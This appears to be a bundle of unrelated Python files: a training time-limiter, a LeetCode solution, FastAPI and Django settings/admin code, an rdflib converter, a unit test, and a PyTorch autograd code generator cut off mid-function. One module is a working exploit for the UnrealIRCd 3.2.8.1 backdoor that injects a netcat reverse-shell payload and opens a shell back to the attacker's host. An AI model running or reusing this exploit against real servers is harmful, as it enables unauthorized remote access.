et = timedelta(seconds=et_seconds)
next_epoch_eta = timedelta(seconds=self.epoch_avg_seconds)
tlr = timedelta(seconds=self.limit - et_seconds)
print('Epoch %d: stop by time limiter. '
'Elapsed time: %s, Next epoch ETA: %s, Time limit remaining: %s.' % (
self.stopped_epoch + 1, et, next_epoch_eta, tlr))
def __parse_limit(self):
if isinstance(self.limit, str):
try:
self.limit = float(self.limit)
self.limit *= 60.
except ValueError:
self.limit = timeparse(self.limit)
elif isinstance(self.limit, timedelta):
self.limit = self.limit.total_seconds()
if self.limit is None:
raise ValueError('TimeLimiter: cannot parse limit.')
if not isinstance(self.limit, float):
self.limit = float(self.limit)
|
class Solution:
def maximumGap(self, nums: List[int]) -> int:
nums.sort()
a=0
b=nums[0]
for x in range(1,len(nums)):
if nums[x]-b>a:
a=nums[x]-b
b=nums[x]
return a
|
# -*- encoding: utf-8 -*-
"""
@File : settings.py
@Time : 2020/12/20 23:34
@Author : chise
@Email : chise123@live.com
@Software: PyCharm
@info :
"""
import os
from . import global_settings
FASTAPI_VARIABLE = "FASTAPI_SETTINGS_MODULE"
import importlib
class Settings:
def __init__(self):
settings_module = os.environ.get(FASTAPI_VARIABLE)
if not settings_module:
work_path = os.getcwd()
path_list = os.path.split(work_path)
if not os.path.isfile(
os.path.join('src', "settings.py")
):
raise ImportError(
"未找到settings.py"
f"你必须设置环境变量{FASTAPI_VARIABLE}=你的settings.py的位置"
"或存在src/settings.py"
)
else:
settings_module = "src.settings"
for setting in dir(global_settings):
if setting.isupper():
setattr(self, setting, getattr(global_settings, setting))
self.SETTINGS_MODULE = settings_module
mod = importlib.import_module(self.SETTINGS_MODULE)
for setting in dir(mod):
if setting.isupper():
setting_value = getattr(mod, setting)
setattr(self, setting, setting_value)
if not getattr(self, "SECRET_KEY"):
raise AttributeError("SECRET_KEY不能为空")
settings = Settings()
|
from msf.lib.exploit import Exploit, Revshell
import socket
import time
class Unrealircd(Exploit):
# constructor
def __init__(self):
super().__init__('UnrealIRCD', 'UnrealIRCD 3.2.8.1 exploit')
# check args
def check(self, target, port=6667):
super().check(target, port)
print('[!] Check not implemented for this exploit.')
# exploit
def exploit(self, target, port=6667, revshell_ip=None, revshell_port=None):
payload = Revshell.build_generic_nc_payload(revshell_ip, revshell_port)
conn = Exploit.init_tcp_conn(target, port)
if not conn:
return False
# wait for connection to initialize
time.sleep(3)
banner = Exploit.get_banner(conn)
# start revshell thread
revshell = Revshell(revshell_ip, revshell_port)
revshell.start()
if Unrealircd.inject_payload(conn, payload):
print('[+] Exploit successful!')
success = True
else:
print('[!] ERROR: Did not gain shell. Exploit failed.')
success = False
# clean up
print('[!] Closing connections to server.')
conn.close()
print('[!] Exploit complete.')
if success:
# we need to wait a while
print('[!] Sleeping for 30 seconds. In that time we should receive a reverse shell. If not, just wait longer!')
time.sleep(30)
return revshell
revshell.terminate()
return success
# Inject a payload into the vulnerable connection.
@staticmethod
def inject_payload(conn, payload):
print('[!] Injecting and running payload.')
# send a simple reverse shell from the exploited server to the attacking host
sent_bytes = conn.send('AB; nohup {} >/dev/null 2>&1\n'.format(payload).encode())
return True
|
import pytest
from math import isclose
from quantities import length
def test_non_SI_unit():
l = length.Length(32)
l1 = l.to_unit(length.foot)
l2 = l.to_unit(length.LengthType.inch)
l3 = l.to_unit(length.LengthType.yard)
l4 = l.to_unit(length.LengthType.mile)
l5 = l.to_unit(length.LengthType.astronomical_unit)
assert isclose(l1.value, 32 * 100 / 2.54 / 12)
assert l1.current_unit == length.foot
assert isclose(l2.value, 32 * 100 / 2.54)
assert l2.current_unit == length.inch
assert isclose(l3.value, 32 * 1.0936)
assert l3.current_unit == length.yard
assert isclose(l4.value, 32 / 1609.34)
assert l4.current_unit == length.mile
assert isclose(l5.value, 32 / 149597870700)
assert l5.current_unit == length.astronomical_unit
|
from django.contrib import admin
from django_jalali.admin.filters import JDateFieldListFilter
import django_jalali.admin as jadmin
from . import models
# Register your models here.
#you need import this for adding jalali calander widget
class DefenseTimeAdmin(admin.ModelAdmin):
list_filter = (
('occurrence_date', JDateFieldListFilter),
)
# admin.site.index_template = 'admin2/index.html'
# admin.site.login_template = 'admin2/login.html'
# admin.site.logout_template=''
# admin.site.password_change_done_template=''
# admin.site.password_change_template=''
# admin.site.app_index_template = 'admin2/app_index.html'
admin.site.register(models.DefenseTime, DefenseTimeAdmin)
#admin.site.register(BarTime, BarTimeAdmin)
admin.site.register(models.Semester)
admin.site.register(models.DefensePlace)
#admin.site.register(models.DefenseTime)
admin.site.register(models.Major)
admin.site.register(models.Student)
admin.site.register(models.ReservationRequest)
admin.site.register(models.DefenseSession)
admin.site.register(models.Professor)
admin.site.site_header = 'پنل مدیریت سامانهی برنامهریزی اتاق دفاع'
admin.site.site_title = 'پنل مدیریت سامانهی برنامهریزی اتاق دفاع'
admin.site.index_title = 'داشبورد مدیریت'
|
from rdflib import Graph, plugin
from rdflib.serializer import Serializer
op = ""
while(True):
try:
testrdf = input()
except:
break
g = Graph().parse(data=testrdf, format='n3')
op+= str(g.serialize(format='json-ld', indent=1)) +'\n'
print(op)
|
# Generates VariableType.h/cpp
#
# VariableType is a subclass of at::Type that provides the binding code
# necessary to provide a differentiable version of ATen operators. There are a
# number of different things we could mean:
#
# - Given a non-differentiable forward implementation, we might
# directly associate it with a backward implementation to make
# it differentiable. This is the common case.
#
# - Some functions don't need a backwards implementation, because
# backpropagation will never propagate beyond them. There are a
# number of different reasons why this may be the case:
#
# - The function has no differentiable inputs
# - The function's output is not differentiable
# - The function has no data dependency on its input
#
# - Some function don't need a backwards implementation because they
# are implemented as a composition of other (differentiable) ATen
# functions. These are dispatched directly to the Type superclass,
# which will in turn dispatch back to VariableType for its
# differentiable subcomponents.
#
from __future__ import print_function
from .utils import CodeTemplate, nested_dict, write, uninplace_api_name
from .gen_autograd import VIEW_FUNCTIONS
from .gen_autograd_functions import uses_single_grad
# These functions are written manually in templates/VariableType.cpp
MANUAL_IMPLEMENTATIONS = {
'resize_', 'resize_as_', 'detach', 'detach_', 'copy_'
}
# These functions we don't want to record for tracing, because we always want
# to trace their constituent parts. This is a temporary hack in lieue
# of proper scopes, where subsequent compilation passes can ask for the unfolding
# on demand. Only concrete ATen methods can be disabled this way; it will have
# NO EFFECT otherwise.
DONT_RECORD_TRACE = {
'convolution', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d',
'conv_transpose2d', 'conv_transpose3d', 'lstm_cell', 'gru_cell',
'rnn_tanh_cell', 'rnn_relu_cell', 'linear',
# FIXME: figure out a better way when we support sparse tensors in jit
'_coalesced_',
}
# These functions have their names recorded under trace renamed,
RENAME_TRACE = {
'zero': 'zeros_like',
'fill': 'full_like',
}
# (declaration name, argument name) -> attribute name
RENAME_ATTRIBUTES = {
('fill_', 'value'): 'fill_value'
}
# These functions are not worth profiling because they are very cheap and may
# be called very often.
DONT_PROFILE = {
'data_ptr', 'get_device', 'is_contiguous', 'is_cuda', 'is_distributed',
'is_same_size', 'is_set_to', 'is_signed', 'is_sparse', 'numel',
'size', 'storage_offset', 'stride',
}
# We don't set or modify grad_fn on these methods. Generally, they return
# tensors that have requires_grad=False. In-place functions listed here will
# not examine or modify requires_grad or grad_fn.
DONT_REQUIRE_DERIVATIVE = {
# These only depend on the input Tensor's shape and device, not the data
'ones_like', 'zeros_like', 'rand_like', 'randn_like',
# These are only implemented on integral types
'__and__', '__iand__', '__ilshift__', '__ior__', '__irshift__', '__ixor__',
'__lshift__', '__or__', '__rshift__', '__xor__',
# These work on integral data types, and hence don't require derivative
'_sobol_engine_draw', '_sobol_engine_ff', '_sobol_engine_scramble_',
'_sobol_engine_initialize_state_',
# This is an unsafe method that is meant to be out of reach of autograd.
'_coalesced_',
}
# NOTE [ Invariant: TensorImpl and Storage Pointer Equality ]
#
# When a function modifies its input tensors (via inplace or out-variants),
# it should never change the the input tensors' underlying c10::TensorImpl pointers
# or c10::Storage pointers.
#
# The following code templates implement the checks for this invariant:
SAVE_TENSOR_STORAGE = CodeTemplate("""\
c10::optional<Storage> ${tensor_name}_storage_saved =
${tensor_name}.has_storage() ? c10::optional<Storage>(${tensor_name}.storage()) : c10::nullopt;
""")
ENFORCE_SAME_TENSOR_STORAGE = CodeTemplate("""\
if (${tensor_name}_storage_saved.has_value())
AT_ASSERT(${tensor_name}_storage_saved.value().is_alias_of(${tensor_name}.storage()));
""")
SAVE_TENSORLIST_STORAGE = CodeTemplate("""\
std::vector<c10::optional<Storage>> ${tensorlist_name}_storage_saved(${tensorlist_name}.size());
for (Tensor tensor : ${tensorlist_name})
${tensorlist_name}_storage_saved.push_back(
tensor.has_storage() ? c10::optional<Storage>(tensor.storage()) : c10::nullopt);
""")
ENFORCE_SAME_TENSORLIST_STORAGE = CodeTemplate("""\
for (size_t i=0; i<${tensorlist_name}.size(); i++) {
if (${tensorlist_name}_storage_saved[i].has_value())
AT_ASSERT(${tensorlist_name}_storage_saved[i].value().is_alias_of(${tensorlist_name}[i].storage()));
}
""")
SAVE_TENSOR_IMPL = CodeTemplate("""\
c10::intrusive_ptr<TensorImpl> ${tensor_name}_impl_saved;
if (${tensor_name}.defined()) ${tensor_name}_impl_saved = ${tensor_name}.getIntrusivePtr();
""")
ENFORCE_SAME_TENSOR_IMPL = CodeTemplate("""\
if (${tensor_name}_impl_saved) AT_ASSERT(${tensor_name}_impl_saved == ${tensor_name}.getIntrusivePtr());
""")
SAVE_TENSORLIST_IMPL = CodeTemplate("""\
std::vector<c10::intrusive_ptr<TensorImpl>> ${tensorlist_name}_impl_saved(${tensorlist_name}.size());
for (size_t i=0; i<${tensorlist_name}.size(); i++)
if (${tensorlist_name}[i].defined()) ${tensorlist_name}_impl_saved[i] = ${tensorlist_name}[i].getIntrusivePtr();
""")
ENFORCE_SAME_TENSORLIST_IMPL = CodeTemplate("""\
for (size_t i=0; i<${tensorlist_name}.size(); i++) {
if (${tensorlist_name}_impl_saved[i])
AT_ASSERT(${tensorlist_name}_impl_saved[i] == ${tensorlist_name}[i].getIntrusivePtr());
}
""")
# The following list contains functions that we don't enforce the invariant on.
DONT_ENFORCE_SAME_TENSOR_IMPL_OR_STORAGE = {
# These functions are expected to change impl or storage of input tensors
'_th_set_', '_cudnn_rnn_flatten_weight',
}
# END CHECKS FOR [ Invariant: TensorImpl and Storage Pointer Equality ]
METHOD_DECLARATION = CodeTemplate("""\
${return_type} ${method_prefix_derived}${api_name}(${type_method_formals}) const override;
""")
METHOD_DEFINITION = CodeTemplate("""\
${return_type} VariableType::${method_prefix_derived}${api_name}(${type_method_formals}) const {
${type_definition_body}
}
""")
UNPACK_TENSOR = CodeTemplate("""\
auto${ref} ${arg_name}_ = unpack${suffix}(${arg_name}, "${arg_name}", ${arg_pos});""")
UNPACK_OPTIONS = CodeTemplate("""\
auto ${arg_name}_ = TensorOptions(${arg_name}).is_variable(false);""")
DECLARE_GRAD_FN = CodeTemplate("""\
std::shared_ptr<${op}> grad_fn;
""")
SETUP_DERIVATIVE = CodeTemplate("""\
if (compute_requires_grad( ${args_with_derivatives} )) {
${setup}
}
""")
ASSIGN_GRAD_FN = CodeTemplate("""\
grad_fn = std::shared_ptr<${op}>(new ${op}(${op_ctor}), deleteFunction);
grad_fn->set_next_edges(collect_next_edges( ${args_with_derivatives} ));
""")
CALL_VIA_TYPE = CodeTemplate("""\
TypeDefault::${method_prefix_derived}${api_name}(${type_method_args})""")
CALL_VIA_DERIVED = CodeTemplate("""\
baseType->${method_prefix_derived}${base_name}(${unpacked_args})""")
# If the `baseType` operation has return values, we use the `tmp` variable to hold the
# values temporarily and pass the values to the return variables outside of the
# `at::AutoNonVariableTypeMode` guard block.
DISPATCH_TO_NON_VAR_TYPE_WITH_RETURN_VALUES = CodeTemplate("""\
auto tmp = ([&]() {
at::AutoNonVariableTypeMode non_var_type_mode(true);
return ${base_type_call};
})();
${return_values} = ${rhs_value};
""")
DISPATCH_TO_NON_VAR_TYPE_WITHOUT_RETURN_VALUES = CodeTemplate("""\
{
at::AutoNonVariableTypeMode non_var_type_mode(true);
${base_type_call};
}
""")
SET_HISTORY = CodeTemplate("""\
if (grad_fn) {
${fn}_history(${differentiable_outputs}, grad_fn);
}
""")
CONDITIONAL = CodeTemplate("""\
if (${cond}) {
${statements}
}
""")
RECORD_FUNCTION = CodeTemplate("""\
RECORD_FUNCTION("${name}", std::vector<c10::IValue>({${input_names}}), Function::peek_at_next_sequence_nr());
""")
SELECT = CodeTemplate("""\
if (${cond}) {
${true}
} else {
${false}
}
""")
OP_NAME = CodeTemplate("""\
op_name = jit::Symbol::fromQualString("aten::${trace_name}");
""")
PRE_RECORD_TRACE = CodeTemplate("""\
torch::jit::Node* node = nullptr;
std::shared_ptr<jit::tracer::TracingState> tracer_state;
if (jit::tracer::isTracing()) {
tracer_state = jit::tracer::getTracingState();
at::Symbol op_name;
${set_op_name}
node = tracer_state->graph->create(op_name, /*num_outputs=*/0);
jit::tracer::recordSourceLocation(node);
${add_trace_inputs}
tracer_state->graph->insertNode(node);
${inplace_guard}
jit::tracer::setTracingState(nullptr);
}
""")
INPLACE_GUARD = CodeTemplate("""\
jit::tracer::ensureUniqueIfOutOfPlaced("${name}", ${mutable_input});
""")
ADD_TRACE_INPUT = CodeTemplate("""jit::tracer::addInputs(node, "${name}", ${input});""")
POST_RECORD_TRACE = CodeTemplate("""\
if (tracer_state) {
jit::tracer::setTracingState(std::move(tracer_state));
${add_trace_outputs}
}
""")
RUN_ONLY_IN_DEBUG_MODE = CodeTemplate("""\
#ifndef NDEBUG
${statements}
#endif
""")
FACTORY_FUNCTION_NAMES = None
def find_factory_functions(declarations):
global FACTORY_FUNCTION_NAMES
FACTORY_FUNCTION_NAMES = set()
for declaration in declarations:
if declaration['is_factory_method']:
FACTORY_FUNCTION_NAMES.add(declaration['api_name'])
def should_trace(declaration):
# Operations involving Storage or Type are not traceable at the moment
if any(arg['simple_type'] in {'Storage', 'Type'} for arg in declaration['arguments']):
return False
# We can't trace functions which don't have any Tensor or TensorList returns
if 'Tensor' not in declaration['return_type']:
return False
name = declaration['name']
base_name = name[:-1] if declaration['inplace'] else name[:-4] if name.endswith('_out') else name
if base_name in DONT_RECORD_TRACE or name in DONT_RECORD_TRACE:
return False
return True
def is_out_overload(declaration):
return declaration['api_name'].endswith('_out')
def format_postrecord_trace(declaration):
# For outplacing ops, *_out overloads require special handling to move the
# output *argument* to a return value
if is_out_overload(declaration):
output_names_outplace = [arg['name'] for arg in declaration['arguments'] if arg.get('output', False)]
output_names_inplace = [r['name'] for r in declaration['returns']]
# Code size optimization: the common case is that the return value is
# the same for both variants
if output_names_outplace == output_names_inplace:
outputs = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names_outplace]
return POST_RECORD_TRACE.substitute(add_trace_outputs=outputs)
local = {}
local['cond'] = 'force_outplace'
local['true'] = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names_outplace]
local['false'] = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names_inplace]
selection = SELECT.substitute(local)
return POST_RECORD_TRACE.substitute(add_trace_outputs=selection)
output_names = [r['name'] for r in declaration['returns']]
outputs = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names]
return POST_RECORD_TRACE.substitute(add_trace_outputs=outputs)
def format_trace_op_name(declaration):
is_inplace = declaration['api_name'] != uninplace_api_name(declaration['api_name'])
if not is_inplace or is_out_overload(declaration):
# special case for *_out functions: the in-place and out-of-place ops
# are overloaded with the same name in the JIT
trace_name = uninplace_api_name(declaration['api_name'])
trace_name = RENAME_TRACE.get(trace_name, trace_name)
return OP_NAME.substitute(trace_name=trace_name)
# otherwise, this is an in-place op and we need to emit both in- and
# out-of-place versions
outplace_trace_name = uninplace_api_name(declaration['api_name'])
inplace_trace_name = declaration['api_name']
outplace_trace_name = RENAME_TRACE.get(outplace_trace_name, outplace_trace_name)
inplace_trace_name = RENAME_TRACE.get(inplace_trace_name, inplace_trace_name)
select_params = {}
select_params['cond'] = 'tracer_state->force_outplace'
select_params['true'] = OP_NAME.substitute(trace_name=outplace_trace_name)
select_params['false'] = OP_NAME.substitute(trace_name=inplace_trace_name)
return SELECT.substitute(select_params)
def format_trace_inputs(declaration):
def dispatch_trace_input(arg_spec):
name, value, simple_type, nullable = arg_spec
# XXX: For arg that have type of Tensor?[], tracer will pass allow_undefined to addInputs
if simple_type == 'TensorList' and nullable:
return '''jit::tracer::addInputs(node, "{}", {}, {});'''.format(name, value, "true")
else:
return ADD_TRACE_INPUT.substitute(name=name, input=value)
trace_inputs = declaration['arguments']
if is_out_overload(declaration):
# *_out functions take the result as a first argument, but they are the
# last argument in the JIT schema.
out_input = trace_inputs[0]
trace_inputs = trace_inputs[1:]
trace_input_spec = [(i['name'], i['name'], i['simple_type'], i.get('is_nullable')) for i in trace_inputs]
trace_inputs = \
'\n'.join(dispatch_trace_input(arg_spec) for arg_spec in trace_input_spec)
if is_out_overload(declaration):
# for *_out functions, handle the result argument differently for inplace/outplace.
# For inplace: just add the input to the end to confirm with the JIT schema
inplace = ADD_TRACE_INPUT.substitute(name=out_input['name'], input=out_input['name'])
# for outplace: do nothing, except if the declaration is a factory.
# Factories are a bit special because their out-of-place overloads
# take an extra TensorOptions argument, which is missing in the _out function
trace_name = uninplace_api_name(declaration['api_name'])
has_factory_name = trace_name in FACTORY_FUNCTION_NAMES
if has_factory_name:
outplace = ADD_TRACE_INPUT.substitute(name='out', input='out.options()')
else:
outplace = ''
trace_inputs += '\n'
trace_inputs += SELECT.substitute(
cond='tracer_state->force_outplace', true=outplace, false=inplace)
return trace_inputs
def format_prerecord_trace(declaration):
local = {}
is_inplace = declaration['api_name'] != uninplace_api_name(declaration['api_name'])
local['set_op_name'] = format_trace_op_name(declaration)
local['add_trace_inputs'] = format_trace_inputs(declaration)
local['inplace_guard'] = ''
if is_inplace:
local['inplace_guard'] = INPLACE_GUARD.substitute(
name=declaration['api_name'],
mutable_input=declaration['arguments'][0]['name'])
return PRE_RECORD_TRACE.substitute(local)
def format_trace(declaration):
return (format_prerecord_trace(declaration), format_postrecord_trace(declaration))
def gen_variable_type(out, aten_declarations, template_path):
"""VariableType.h and VariableType.cpp body
This is the at::Type subclass for differentiable tensors. The
implementation of each function dispatches to the base tensor type to
compute the output. The grad_fn is attached to differentiable functions.
"""
# WARNING: this function call modifies global mutable state
find_factory_functions(aten_declarations)
aten_declarations = list(sorted(aten_declarations, key=lambda decl: decl['name']))
gen_variable_type_shard(out, aten_declarations, template_path, None, True)
# NOTE: see Note [Sharded File] at the top of the VariableType.cpp
# template regarding sharding of the generated files.
num_shards = 5
shards = [[] for _ in range(num_shards)]
# functions are assigned arbitrarily but stably to a file based on hash
for decl in aten_declarations:
x = sum(ord(c) for c in decl['name']) % num_shards
shards[x].append(decl)
for i, shard in enumerate(shards):
gen_variable_type_shard(out, shard, template_path, '_%d' % i, False)
gen_variable_type_shard(out, aten_declarations, template_path, 'Everything', False)
def gen_variable_type_shard(out, aten_declarations, template_path, suffix, header):
VARIABLE_TYPE_H = CodeTemplate.from_file(template_path + '/VariableType.h')
VARIABLE_TYPE_CPP = CodeTemplate.from_file(template_path + '/VariableType.cpp')
type_declarations = []
type_definitions = []
for declaration in aten_declarations:
# Factory methods usually do not appear in `VariableType` at all, since they
# don't dispatch via `Type`; except in the case where the implementation is 'abstract'
# in which case they do!
if declaration['is_factory_method']:
continue
type_declarations.append(METHOD_DECLARATION.substitute(declaration))
if declaration['name'] not in MANUAL_IMPLEMENTATIONS:
type_definitions.append(emit_method_definition(declaration))
env = {
'type_derived_method_declarations': type_declarations,
'type_derived_method_definitions': type_definitions,
}
if header:
write(out, 'VariableType.h', VARIABLE_TYPE_H, env)
else:
write(out, 'VariableType%s.cpp' % suffix, VARIABLE_TYPE_CPP, env)
def emit_method_definition(declaration):
body = emit_body(declaration)
return METHOD_DEFINITION.substitute(declaration, type_definition_body=body)
def emit_body(declaration):
strategy = dispatch_strategy(declaration)
arguments = declaration['arguments']
returns = declaration['returns']
func = declaration['derivative']
name = declaration['name']
inplace = declaration['inplace']
is_out_fn = name.endswith('_out')
modifies_arguments = inplace or is_out_fn
returns_void = len(returns) == 1 and returns[0]['type'] == 'void'
base_name = name[:-1] if inplace else name[:-4] if is_out_fn else name
view_info = VIEW_FUNCTIONS.get(base_name, None)
def is_differentiable(arg):
if 'TensorOptions' in arg['type']:
return False
if 'Tensor' not in arg['type']:
return False
if arg['dynamic_type'] in {'IndexTensor', 'BoolTensor'}:
# These are necessary for legacy code and should be
# used by legacy code only!
assert declaration['mode'] == 'TH' or declaration['mode'] == 'NN', \
"IndexTensor and BoolTensor are restricted to legacy TH/THNN functions only."
return False
if arg['name'] in declaration.get('non_differentiable_arg_names', []):
return False
return True
def find_args_with_derivatives(differentiable_inputs):
"""Find arguments that have derivative definitions"""
if func is None:
return differentiable_inputs
names = set(name for d in func['derivatives'] for name in d['var_names'])
differentiable = [arg for arg in differentiable_inputs if arg['name'] in names]
if len(differentiable) != len(names):
missing = names - set(arg['name'] for arg in differentiable)
raise RuntimeError('Missing arguments for derivatives: {} in {}'.format(missing, func['name']))
return differentiable
inputs = [arg for arg in arguments if not arg.get('output', False)]
differentiable_inputs = list(filter(is_differentiable, inputs))
args_with_derivatives = find_args_with_derivatives(differentiable_inputs)
non_differentiable_arg_names = declaration.get('non_differentiable_arg_names', [])
candidate_differentiable_outputs = list(filter(is_differentiable, returns))
if declaration['output_differentiability'] is not None:
differentiable_outputs = []
output_differentiability = declaration['output_differentiability']
for differentiable, output in zip(output_differentiability, returns):
if differentiable:
differentiable_outputs.append(output)
elif uses_single_grad(func):
differentiable_outputs = candidate_differentiable_outputs[:1]
else:
differentiable_outputs = candidate_differentiable_outputs
requires_derivative = (
base_name not in DONT_REQUIRE_DERIVATIVE and name not in DONT_REQUIRE_DERIVATIVE and
len(differentiable_inputs) > 0 and len(differentiable_outputs) > 0 and
strategy == 'use_derived')
if func is not None and not requires_derivative:
raise RuntimeError('ERROR: derivative ignored for {} -- specified an autograd function without derivative'
.format(name))
def emit_save_inputs():
setup = []
if func is None:
return setup
has_tensorlist_arg = any(arg['type'] == 'TensorList' for arg in func['args_with_derivatives'])
# We don't want to save tensors if we know that they will never be used
# when computing the derivative, so we add guards to those statements
def guard_for(arg):
# It's hard to determine the edge offset if we have TensorLists
if has_tensorlist_arg:
return None
# Empirical evaluation of the cases where we insert those guards in
# backward show that they are somewhat useless. E.g. there's no need
# to guard on some values captured from forward, because they had to
# require_grad if the backward function even gets executed. I don't
# have any good ideas for detecting those cases, so I simply disabled the
# checks.
if 'backward' in func['name']:
return None
# If there's a single derivative we could compute, we already have
# a requires_grad check that is sufficient
if len(func['args_with_derivatives']) <= 1:
return None
# We really only care about trimming down the amount of tensors we save
if arg['type'] != 'Tensor':
return None
# We want to emit simple guards, so we only allow that if checking one
# input is enough to determine whether we need that value
used_in = [d for d in func['derivatives'] if arg in d['saved_inputs']]
assert len(used_in) > 0
if len(used_in) != 1:
return None
derivative = used_in[0]
if len(derivative['var_names']) != 1:
return None
derivative_var_name = derivative['var_names'][0]
# Figure out the offset of the edge that uses this variable
for edge_off, arg in enumerate(func['args_with_derivatives']):
if arg['name'] == derivative_var_name:
break
else:
assert False
return 'grad_fn->should_compute_output({})'.format(edge_off)
setup.extend(save_variables(func['saved_inputs'], False, guard_for))
for arg in func['args_with_derivatives']:
if arg['type'] == 'TensorList':
setup.append("grad_fn->{}_size_ = {}.size();".format(arg['name'], arg['name']))
return setup
def setup_derivative(differentiable_inputs):
env = {}
env['args_with_derivatives'] = reference_args(args_with_derivatives)
env['op'] = func['op'] if func is not None else 'NotImplemented'
env['op_ctor'] = '' if func is not None else '"{}"'.format(declaration['api_name'])
if is_out_fn:
setup = ['throw_error_out_requires_grad("{}");'.format(base_name)]
body = []
body.append(DECLARE_GRAD_FN.substitute(op='Function'))
body.append(SETUP_DERIVATIVE.substitute(
setup=setup,
args_with_derivatives=reference_args(differentiable_inputs)))
body.append(SETUP_DERIVATIVE.substitute(
setup=setup,
args_with_derivatives=reference_args(differentiable_outputs)))
return body
setup = []
setup.extend(ASSIGN_GRAD_FN.substitute(env).split('\n'))
setup.extend(emit_save_inputs())
body = []
body.extend(emit_check_no_requires_grad(differentiable_inputs, args_with_derivatives))
body.append(DECLARE_GRAD_FN.substitute(env))
body.append(SETUP_DERIVATIVE.substitute(env, setup=setup))
return body
def emit_check_no_requires_grad(tensor_args, args_with_derivatives):
"""Checks that arguments without derivatives don't require grad"""
body = []
for arg in tensor_args:
if arg in args_with_derivatives:
continue
name = arg['name']
if name in non_differentiable_arg_names:
continue
if name == 'output':
# Double-backwards definitions sometimes take in 'input' and
# 'output', but only define the derivative for input.
continue
if arg['dynamic_type'] in {'IndexTensor', 'BoolTensor'}:
continue
body.append('check_no_requires_grad({}, "{}");'.format(name, name))
return body
def save_variables(saved_variables, is_output, guard_for=lambda name: None):
# assign the saved variables to the generated grad_fn
stmts = []
for arg in saved_variables:
name = arg['name']
expr = arg.get('expr', arg['name'])
if arg['type'] == 'Tensor' or (is_output and arg['type'] == 'Scalar'):
name += '_'
var = arg['name']
if var == 'self' and inplace:
var = 'self.clone()'
assert not is_output
if inplace and is_output:
var = 'self'
expr = 'SavedVariable({}, {})'.format(var, str(is_output).lower())
elif arg['type'] == 'TensorList':
name += '_'
expr = 'make_saved_variable_list({})'.format(arg['name'])
elif arg['type'] == 'IntArrayRef':
expr = expr + ".vec()"
guard = guard_for(arg)
if guard is None:
stmts.append('grad_fn->{} = {};'.format(name, expr))
else:
stmts.append('if ({}) {{'.format(guard))
stmts.append(' grad_fn->{} = {};'.format(name, expr))
stmts.append('}')
return stmts
def reference_args(args):
res = []
for arg in args:
if arg['type'] == 'SparseTensorRef':
res.append('{}.tref'.format(arg['name']))
else:
res.append(arg['name'])
return res
def emit_record_trace(env):
if not should_trace(declaration):
return ('', '')
return format_trace(declaration)
def declare_returned_variables():
if modifies_arguments:
return ''
if len(declaration['returns']) == 1:
return ''
# TODO: this will be ugly
names = [ret['type'] + ' ' + ret['name'] + ';' for ret in declaration['returns']]
return '\n'.join(names)
def wrap_output(call):
# Returns a 2-tuple `(wrapped_call, extra_wrapping_stmts)`, where
# `wrapped_call` is to drop-in replace `call`, and
# `extra_wrapping_stmts` is a list of extra statements to run after
# `call`.
if 'Tensor' not in declaration['return_type']:
return call, []
elif view_info is not None:
# See NOTE [ Autograd View Variables ] in variable.h for details.
differentiable_output_vars = {r['name'] for r in differentiable_outputs}
tensor_output_vars = {r['name'] for r in returns if 'Tensor' in r['type']}
if not isinstance(view_info, dict):
if len(differentiable_output_vars) == len(tensor_output_vars):
# all outputs are differentiable
return 'as_view({}, {}, true)'.format(view_info, call), []
elif len(differentiable_output_vars) == 0:
# no output is differentiable
return 'as_view({}, {}, false)'.format(view_info, call), []
else:
# some of the outputs are differentiable
# need to expand to dict mode, i.e., one entry per output
base_name = view_info
view_info_dict = {}
for i, return_info in enumerate(returns):
if 'Tensor' in return_info['type']:
view_info_dict[i] = base_name
else:
view_info_dict = view_info
def wrap_view_single(output_var, base_var):
fmt = '{output_var} = as_view({base_var}, {output_var}, {is_differentiable});'
if output_var in differentiable_output_vars:
# If `GradMode::is_enabled()` is False, this is a
# non-differentiable view. Gradients should not flow through.
is_differentiable = 'true'
else:
# This output is non-differentiable, so it is a
# non-differentiable view. Gradients should not flow through.
is_differentiable = 'false'
return fmt.format(output_var=output_var, base_var=base_var,
is_differentiable=is_differentiable)
extra_wrapping_stmts = []
for output_idx, return_info in enumerate(returns):
if 'Tensor' not in return_info['type']:
assert output_idx not in view_info_dict, 'Can not wrap non-Tensor output as a view'
continue
output_var = return_info['name']
if output_idx in view_info_dict:
stmt = wrap_view_single(output_var, view_info_dict[output_idx])
elif 'Tensor' in return_info['type']:
stmt = '{output_var} = as_variable({output_var});'.format(output_var=output_var)
extra_wrapping_stmts.append(stmt)
return call, extra_wrapping_stmts
else:
return 'as_variable({})'.format(call), []
def enforce_same_tensorimpl_and_storage(env, call):
save_ptrs_stmts = []
enforce_same_ptrs_stmts = []
if declaration['name'] not in DONT_ENFORCE_SAME_TENSOR_IMPL_OR_STORAGE:
for arg in env.get('unpacked_args', []):
simple_type = env['unpacked_args_simple_type'][arg]
if simple_type == 'TensorList':
save_ptrs_stmts += [SAVE_TENSORLIST_STORAGE.substitute(tensorlist_name=arg),
SAVE_TENSORLIST_IMPL.substitute(tensorlist_name=arg)]
enforce_same_ptrs_stmts += [ENFORCE_SAME_TENSORLIST_STORAGE.substitute(tensorlist_name=arg),
ENFORCE_SAME_TENSORLIST_IMPL.substitute(tensorlist_name=arg)]
elif simple_type == 'Tensor':
save_ptrs_stmts += [SAVE_TENSOR_STORAGE.substitute(tensor_name=arg),
SAVE_TENSOR_IMPL.substitute(tensor_name=arg)]
enforce_same_ptrs_stmts += [ENFORCE_SAME_TENSOR_STORAGE.substitute(tensor_name=arg),
ENFORCE_SAME_TENSOR_IMPL.substitute(tensor_name=arg)]
assert (save_ptrs_stmts and enforce_same_ptrs_stmts) or (not save_ptrs_stmts and not enforce_same_ptrs_stmts)
if save_ptrs_stmts and enforce_same_ptrs_stmts:
call = RUN_ONLY_IN_DEBUG_MODE.substitute(statements=save_ptrs_stmts) + \
call + \
RUN_ONLY_IN_DEBUG_MODE.substitute(statements=enforce_same_ptrs_stmts)
return call
def emit_call(env):
combined = nested_dict(env, declaration)
extra_wrapping_stmts = []
if strategy == 'use_derived':
# We only care about adding `at::AutoNonVariableTypeMode` guard for `baseType` dispatch
# (which corresponds to 'use_derived' strategy). The purpose of this guard is to make sure
# the baseType operations still dispatch to non-Variable type, even if the arguments passed
# in are now Variables.
